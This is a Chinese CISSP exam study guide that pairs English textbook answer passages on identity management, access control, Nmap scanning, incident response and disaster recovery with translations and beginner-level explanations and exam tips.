把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

防火墙:防火墙根据规则控制网络流量进出。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 174 / PDF P1568

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

circuits, is sensitive to the loss of data, and is used for any form of communication. 4. Email is inherently insecure because it is primarily a plaintext communication medium and employs nonencrypted transmission protocols. This allows email to be easily spoofed, spammed, flooded, eavesdropped on, interfered with, and hijacked. Defenses against these issues primarily include having stronger authentication requirements and using encryption to protect the content while in transit. 5. The RFC 1918 private IP address ranges are as follows: 10.0.0.0– 10.255.255.255 (a full Class A range); 172.16.0.0–172.31.255.255 (16 Class B ranges); and 192.168.0.0–192.168.255.255 (256 Class C ranges).

APIPA assigns each failed DHCP client with an IP address from the range of 169.254.0.1 to 169.254.255.254 along with the default Class B subnet mask of 255.255.0.0. Technically, the entire 127.0.0.0/8 network is reserved for loopback use in IPv4. However, only the 127.0.0.1 address is widely used. 6. Many facts about VLANs are included in this chapter. Answers can include any of the following options. A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs can be defined/assigned/created based on ports, device MAC address, IP subnetting, specified protocols, or authentication.

VLANs are used for traffic management because they are a form of network segmentation. VLAN routing can be provided either by an external router or by the switch's internal software (one reason for the terms L3 switch and multilayer switch). VLANs control and restrict broadcast traffic and reduce a network's vulnerability to sniffers because a switch treats each VLAN as a separate network division. The members of a private VLAN or a port-isolated VLAN can interact only with one another and over the predetermined exit port or uplink port.

The trunk link allows the switches to talk to each other directly, direct traffic between hosts, and stretch VLAN definitions across multiple physical switches.

中文直译 / 整理

电路对数据丢失敏感,用于任何形式的通信。 4. 电子邮件本质上是不安全的,因为它主要是一种明文通信媒介,并采用 非加密传输协议。 这使得电子邮件容易被伪造、垃圾邮件轰炸、泛滥、窃 听、干扰和劫持。 针对这些问题的防御措施主要包括加强身份验证要求, 并使用加密技术在传输过程中保护内容。 5. RFC 1918 私有 IP 地址范围如下:10.0.0.0–10.255.255.255(一个完整的 Class A 范围); 172.16.0.0–172.31.255.255(16 个 Class B 范围); 以及 192.168.0.0–192.168.255.255(256 个 Class C 范围)。 APIPA 为每个失败的 DHCP 客户端分配一个从 169.254.0.1 到 169.254.255.254 范围内的 IP 地址, 并使用默认的 Class B 子网掩码 255.255.0.0。 从技术上讲,整个 127.0.0.0/8 网 络在 IPv4 中保留用于环回用途。 然而,只有 127.0.0.1 地址被广泛使用。 6. 本章包含了有关VLAN的许多事实。 答案可包括以下任何选项。

虚拟局域 网(VLAN)是由交换机实现的硬件级网络分段。 VLAN可根据端口、设备 MAC地址、IP子网划分、指定协议或认证进行定义/分配/创建。 VLAN用于 流量管理,因为它们是一种网络分段形式。 VLAN路由可通过外部路由器或 交换机的内部软件提供(这也是术语L3交换机和多层交换机的由来之一)。 VLAN通过控制和限制广播流量来降低网络对嗅探器的脆弱性,因为交换机 会将每个VLAN视为独立的网络分区。 私有VLAN或端口隔离VLAN的成员只 能彼此交互,并通过预设的出口端口或上行端口通信。 中继链路允许交换机 直接相互通信、在主机间转发流量,并将VLAN定义扩展到多个物理交换机 上。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 175 / PDF P1569

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Chapter 13: Managing Identity and Authentication 1. Physical access controls are anything you can touch. They include perimeter security controls (such as fences and gates) and environmental controls such as heating, ventilation, and air-conditioning (HVAC) systems. Logical access controls are also known as technical controls. They include authentication, authorization, and permission controls. 2. Identification occurs when a subject claims an identity, such as with a username. Authentication occurs when the subject provides information to verify the claimed identity is the subject's identity. For example, a user provides the correct password matched to the username.

Authorization is the process of granting the subject rights and permissions based on the subject's proven identity. Accounting is accomplished by logging subjects' actions and is reliable only if the identification and authentication processes are strong and secure. 3. The three primary authentication factor types are something you know, something you have, and something you are, also known as Type 1, Type 2, and Type 3, respectively. Something you know is a memorized secret such as a password or PIN. Something you have includes devices that a person can touch and hold, such as a smartcard or hardware authenticator.

Something you are uses biometric methods such as fingerprints or facial identification. 4. Federated identity management (FIM) systems allow single sign-on (SSO) to be extended beyond a single organization. SSO allows users to authenticate once and access multiple resources without authenticating again. SAML is a common language used to exchange federated identity information between organizations. 5. Organizations use provisioning and onboarding processes when hiring employees and deprovisioning and offboarding processes when employees leave.

中文直译 / 整理

第13章:管理身份和认证 1. 物理访问控制是您能够触摸到的任何东西。 它们包括边界安全控制(如围 栏和门禁)以及环境控制,例如供暖、通风和空调(HVAC)系统。 逻辑访 问控制也称为技术控制,包括认证、授权和权限控制。 2. 身份识别发生在主体声明身份时,例如使用用户名。 认证发生在主体提供 信息以验证所声明的身份确实是其自身身份时。 例如,用户提供了与用户名 匹配的正确密码。 授权是根据主体已验证的身份授予其权利和权限的过程。 记账通过记录主体的操作来实现,只有在身份识别和认证过程强大且安全时 才可靠。 3. 三种主要的认证因素类型分别是:您知道的东西、您拥有的东西和您自身 的特征,分别称为类型1、类型2和类型3。 您知道的东西是如密码或PIN码 这样的记忆秘密。 您拥有的东西包括个人可以触摸和持有的设备,例如智能 卡或硬件认证器。 您自身的特征则使用生物识别方法,如指纹或面部识别。 4. 联合身份管理(FIM)系统允许将单点登录(SSO)扩展到单个组织之外。 SSO 允许用户只需进行一次身份验证,即可访问多个资源而无需再次认证。 SAML 是组织之间交换联合身份信息的常用语言。

5. 组织在雇佣员工时使用配置和入职流程,在员工离职时使用取消配置和 离职流程。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 176 / PDF P1570

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Chapter 14: Controlling and Monitoring Access 1. The primary difference between discretionary and nondiscretionary access control models is in how they are controlled and managed. Administrators centrally administer nondiscretionary access controls. DAC models allow owners to make their own changes, and their changes don't affect other parts of the environment. 2. Some common standards used to provide SSO capabilities on the Internet are Security Assertion Markup Language (SAML), OAuth, and OpenID Connect (OIDC). 3. The PowerShell cmdlet that allows you to run PowerShell commands indirectly is Invoke-Expression.

The following command shows how to run it, assuming you have a PowerShell script named hello.ps1 in the current directory: powershell.exe "& {Get-Content .\hello.ps1 | Invoke-Expression} If you want to see this in action, create the hello.ps1 file with the following line: Write-Host 'Hello, World' 4. Mimikatz is a popular tool used in privilege escalation attacks, including pass the hash and Kerberos exploitation attacks. PsExec, one of the tools in the Sysinternals process utilities (PsTools), is another tool often used in these attacks.

中文直译 / 整理

第14章:控制和监控访问 1. 自主访问控制模型与非自主访问控制模型的主要区别在于它们的控制和管 理方式。 管理员集中管理非自主访问控制。 DAC模型允许所有者自行进行更 改,且其更改不会影响环境的其他部分。 2. 用于在互联网上提供单点登录(SSO)功能的一些常见标准包括安全断 言标记语言(SAML)、OAuth和OpenID Connect(OIDC)。 3. 允许您间接运行PowerShell命令的PowerShell cmdlet是Invoke-Expression。 以下命令展示了如何 运行它,假设当前目录中有一个名为hello.ps1的PowerShell脚本: powershell.exe "& {Get‑Content .\hello.ps1 | Invoke‑Expression}" 如果您想查看实际效果,请创建以下内容的 hello.ps1 文件: Write‑Host 'Hello , World' 4. Mimikatz 是一种在权限提升攻击中广泛使用的工具,包括传递哈希和 Kerberos 利用攻击。

PsExec 是 Sysinternals 进程工具集(PsTools)中 的一个工具,也常用于这些攻击。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

自主访问控制 DAC:DAC 由对象所有者决定谁能访问。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

文件所有者授权、ACL 常见于 DAC。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 177 / PDF P1571

第 1571 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 15: Security Assessment and Testing 1. TCP SYN scanning sends a single packet to each scanned port with the SYN flag set. This indicates a request to open a new connection. If the scanner receives a response that has the SYN and ACK flags set, this indicates that the system is moving to the second phase in the three-way TCP handshake and that the port is open. TCP SYN scanning is also known as “half-open” scanning. TCP connect scanning opens a full connection to the remote system on the specified port. This scan type is used when the user running the scan does not have the necessary permissions to run a half-open scan. 2.

The five possible port status values returned by Nmap are as follows: Open: The port is open on the remote system and there is an application that is actively accepting connections on that port. Closed: The port is accessible on the remote system, meaning that the firewall is allowing access, but there is no application accepting connections on that port. Filtered: Nmap is unable to determine whether a port is open or closed because a firewall is interfering with the connection attempt. Unfiltered: The port is accessible, but Nmap cannot determine whether it is open or closed.

It is unfiltered because the port is exposed to the packet probes sent by Nmap, but no conclusive evidence can determine the port's status. Open | Filtered: Nmap cannot establish whether the port is open or filtered. This state occurs when a port does not respond to Nmap's probes, which could be due to packet filtering preventing Nmap's requests from reaching the port, or the port is open but designed not to respond to the probes used by Nmap. 3. Static software testing techniques, such as code reviews, evaluate the security of software without running it by analyzing either the source code or the compiled application.

Dynamic testing evaluates the security of software in a runtime environment and is often the only option for organizations deploying applications written by someone else. 4. Mutation (dumb) fuzzing takes previous input values from actual operation of the software and manipulates (or mutates) it to create

中文直译 / 整理

第15章:安全评估与测试 1. TCP SYN 扫描会向每个扫描端口发送一个设置了 SYN 标志的单个数据包。 这表示请求建立新连接。 如果扫描器收到一个设置了 SYN 和 ACK 标志的响 应,则表示系统正在进入三次 TCP 握手的第二阶段,端口处于开放状态。 TCP SYN 扫描也被称为“半开放”扫描。 TCP 连接扫描会在指定端口上与 远程系统建立完整连接。 当执行扫描的用户没有运行半开放扫描所需权限时, 会使用这种扫描类型。 2. Nmap 返回的五个可能端口状态值如下: 开放:该端口在远程系统上处于开放状态,且有应用程序正在主 动接受连接。 关闭:该端口在远程系统上可访问,即防火墙允许访问,但没有应 用程序在该端口上接受连接。 过滤:由于防火墙干扰了连接尝试,Nmap 无法确定端口是开放还是关 闭。 未过滤:端口可访问,但 Nmap 无法确定其是开放还是关 闭。 该端口为未过滤状态,是因为它暴露在 Nmap 发送的数据 包探测下,但没有确凿证据能确定端口的状态。 开放| 过滤:Nmap 无法确定端口是开放还是被过滤。

当端口未对 Nmap 的探测做出响应时,会出现这种状态,原因可能是数据包过滤 阻止了 Nmap 的请求到达端口,或者端口虽开放但被设计为不响应 Nmap 使用的探测方式。 3. 静态软件测试技术(如代码审查)通过分析源代码或编译后的应用程序, 在不运行软件的情况下评估其安全性。 动态测试则在运行时环境中评估软件 的安全性,对于部署他人开发的应用程序的组织而言,这通常是唯一的选择。 4. 变异(盲目)模糊测试会获取软件实际运行中的先前输入值,并对其进 行操作(或变异)以创建

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1571 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 178 / PDF P1572

第 1572 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

fuzzed input. It might alter the characters of the content, append strings to the end of the content, or perform other data manipulation techniques. Generational (intelligent) fuzzing develops data models and creates new fuzzed input based on an understanding of the types of data used by the program.

中文直译 / 整理

模糊输入。 它可能会更改内容的字符,在内容末尾附加字符串,或执行其 他数据操作技术。 代际(智能)模糊测试会开发数据模型,并基于对程序所使用数据类型的 理解来创建新的模糊输入。

小白解释

场景先行:你是公司的安全负责人,正在读第 1572 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1572 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 179 / PDF P1573

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Chapter 16: Managing Security Operations 1. Need-to-know focuses on permissions and the ability to access information, whereas the least privilege principle focuses on privileges. Privileges include both rights and permissions. Both limit the access of users and subjects to only what they need. Following these principles prevents and limits the scope of security incidents. 2. Monitoring the assignment and usage of special privileges detects when individuals are granted higher privileges, such as when they are added to an Administrator account. It can detect when unauthorized entities are granted higher privileges.

Monitoring the usage of special privileges detects when entities are using higher privileges, such as creating unauthorized accounts, accessing or deleting logs, and creating automated tasks. This monitoring can detect potential malicious insiders and remote attackers. 3. The three primary cloud-based service models are software as a service (SaaS), platform as a service (PaaS), and infrastructure as a service (IaaS). The cloud service provider (CSP) provides the most maintenance and security services with SaaS, less with PaaS, and the least with IaaS. While NIST SP 800-145 provides these definitions, CSPs sometimes use their own terms and definitions in marketing materials. 4.

Change management processes help prevent outages by ensuring that proposed changes are reviewed, approved, and tested before being deployed. They also ensure that changes are documented.

中文直译 / 整理

第16章:安全管理运营 1. 需知原则侧重于权限和访问信息的能力,而最小特权原则侧重于特权。 特权包括权利和权限。 两者均将用户和主体的访问限制在仅需的范围内。 遵循这些原则可预防并限制安全事件的范围。 2. 监控特殊特权的分配和使用,可检测到个人被授予更高特权的情况,例如 当其被添加到管理员账户时。 它还能检测到未经授权的实体被授予更高特权 的情况。 监控特殊特权的使用,可检测到实体使用更高特权的情况,例如创 建未经授权的账户、访问或删除日志、以及创建自动化任务。 这种监控可检 测潜在的恶意内部人员和远程攻击者。 3. 三种主要的基于云的服务模型是软件即服务(SaaS)、平台即服务( PaaS)和基础设施即服务(IaaS)。 云服务提供商(CSP)在SaaS中提供 最多的维护和安全服务,在PaaS中较少,在IaaS中最少。 尽管NIST SP 800‑145提供了这些定义,但CSP有时在营销材料中使用自己的术语和定义。 4. 变更管理流程通过确保拟议的变更在部署前经过审查、批准和测试,来 防止中断。 它们还确保变更得到记录。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 180 / PDF P1574

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 17: Preventing and Responding to Incidents 1. An incident is any event that has a negative effect on the confidentiality, integrity, or availability of an organization's assets. 2. Incident management steps listed in the CISSP Security Operations domain are detection, response, mitigation, reporting, recovery, remediation, and lessons learned. 3. Intrusion detection systems are described as host-based or networkbased, knowledge-based or behavior-based, and passive or active. Hostbased IDSs examine events on individual computers in great detail, including file activities, accesses, and processes.

Network-based IDSs examine general network events and anomalies through traffic evaluation. A knowledge-based IDS uses a database of known attacks to detect intrusions. A behavior-based IDS starts with a baseline of normal activity and measures network activity against the baseline to identify abnormal activity. A passive response will log the activity and often provide a notification. An active response directly responds to the intrusion to stop or block the attack. 4. A SIEM system collects log entries from multiple sources in a centralized application. It can accept data from dissimilar devices and correlate and aggregate all of the data into useful information.

It can also be configured to send alerts in real time to specific items of interest. 5. Security orchestration, automation, and response (SOAR) refers to a group of technologies that automatically respond to some incidents. This reduces the workload on administrators.

中文直译 / 整理

第17章:预防和应对事件 1. 事件是指对组织资产的机密性、完整性或可用性产生负面影响的任何事件。 2. CISSP安全运营领域中列出的事件管理步骤包括检测、响应、缓解、 报告、恢复和补救 , 和经验教训。 3. 入侵检测系统可分为基于主机或基于网络、基于知识或基于行为、被动 或主动。 基于主机的IDS会详细检查单个计算机上的事件,包括文件活动、 访问和进程。 基于网络的IDS通过流量评估检查一般的网络事件和异常。 基 于知识的IDS使用已知攻击的数据库来检测入侵。 基于行为的IDS首先建立 正常活动的基线,然后将网络活动与基线进行对比以识别异常活动。 被动响 应会记录活动并通常提供通知。 主动响应则直接对入侵做出反应,以阻止或 拦截攻击。 4. SIEM系统在一个集中式应用程序中收集来自多个来源的日志条目。 它能 够接受不同设备的数据,并将所有数据关联和聚合为有用的信息。 它还可以 配置为实时向特定关注项发送警报。 5. 安全编排、自动化与响应(SOAR)指的是一组能够自动响应某些事件的 技术。 这减轻了管理员的工作负担。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 181 / PDF P1575

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Chapter 18: Disaster Recovery Planning 1. Businesses have three main concerns when considering adopting a mutual assistance agreement. First, the nature of an MAA often necessitates that the businesses be located in close geographical proximity. However, this requirement also increases the risk that the two businesses will fall victim to the same threat. Second, MAAs are difficult to enforce in the middle of a crisis. If one of the organizations is affected by a disaster and the other isn't, the organization not affected could back out at the last minute, leaving the other organization out of luck.

Finally, confidentiality concerns (both legal and business related) often prevent businesses from trusting others with their sensitive operational data. 2. There are six main types of disaster recovery tests: Read-throughs involve the distribution of recovery checklists to disaster recovery personnel for review. Tabletops involve the members of the disaster recovery team gathering in a large conference room and role-playing a disaster scenario. Walk-through exercises include taking physical actions or at least considering their impact on the exercise. Simulation tests are more comprehensive and may impact one or more noncritical business units of the organization.

Parallel tests involve relocating personnel to the alternate site and commencing operations there. Full-interruption tests involve relocating personnel to the alternate site and shutting down operations at the primary site. 3. Full backups create a copy of all data stored on a server. Incremental backups create copies of all files modified since the last full or incremental backup. Differential backups create copies of all files modified since the last full backup without regard to any previous differential or incremental backups that may have taken place. 4. Cloud computing influences disaster recovery programs in two major ways.

First, the cloud provides excellent opportunities for disaster recovery operations, offering on-demand access to technology resources. Second, organizations using the cloud must ensure that they implement

中文直译 / 整理

第18章:灾难恢复规划 1. 企业在考虑采用互助协议时,主要关注三个问题。 首先,互助协议的性质 通常要求企业地理位置相近。 然而,这一要求也增加了两家企业同时遭遇相 同威胁的风险。 其次,在危机发生时,互助协议难以执行。 如果一家组织受 到灾难影响而另一家没有,未受影响的组织可能在最后一刻退出,使另一家 组织陷入困境。 最后,机密性问题(包括法律和业务相关)通常使企业不愿 将敏感的运营数据交给他人。 2. 灾难恢复测试主要有六种类型: 阅读演练涉及将恢复检查清单分发给灾难恢复人员进行审阅。 桌面演练涉及灾难恢复团队成员聚集在大型会议室中,模拟灾难 场景。 步行演练包括采取实际行动,或至少考虑其对演练的影响。 模拟测试更为全面,可能影响组织的一个或多个非关键业务单元。 并行测试涉及将人员转移到备用站点并在该处启动运营。 完全中断测试涉及将人员转移到备用站点,并关闭主站点的运营。 3. 完全备份会创建服务器上所有数据的副本。 增量备份会创建自上次完 全备份或增量备份以来所有已修改文件的副本。 差异备份会创建自上次 完全备份以来所有已修改文件的副本,而不考虑之前可能进行的任何差 异或增量备份。

4. 云计算以两种主要方式影响灾难恢复计划。 首先,云为灾难恢复操作提供 了绝佳的机会,可按需访问技术资源。 其次,使用云的组织必须确保实施

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

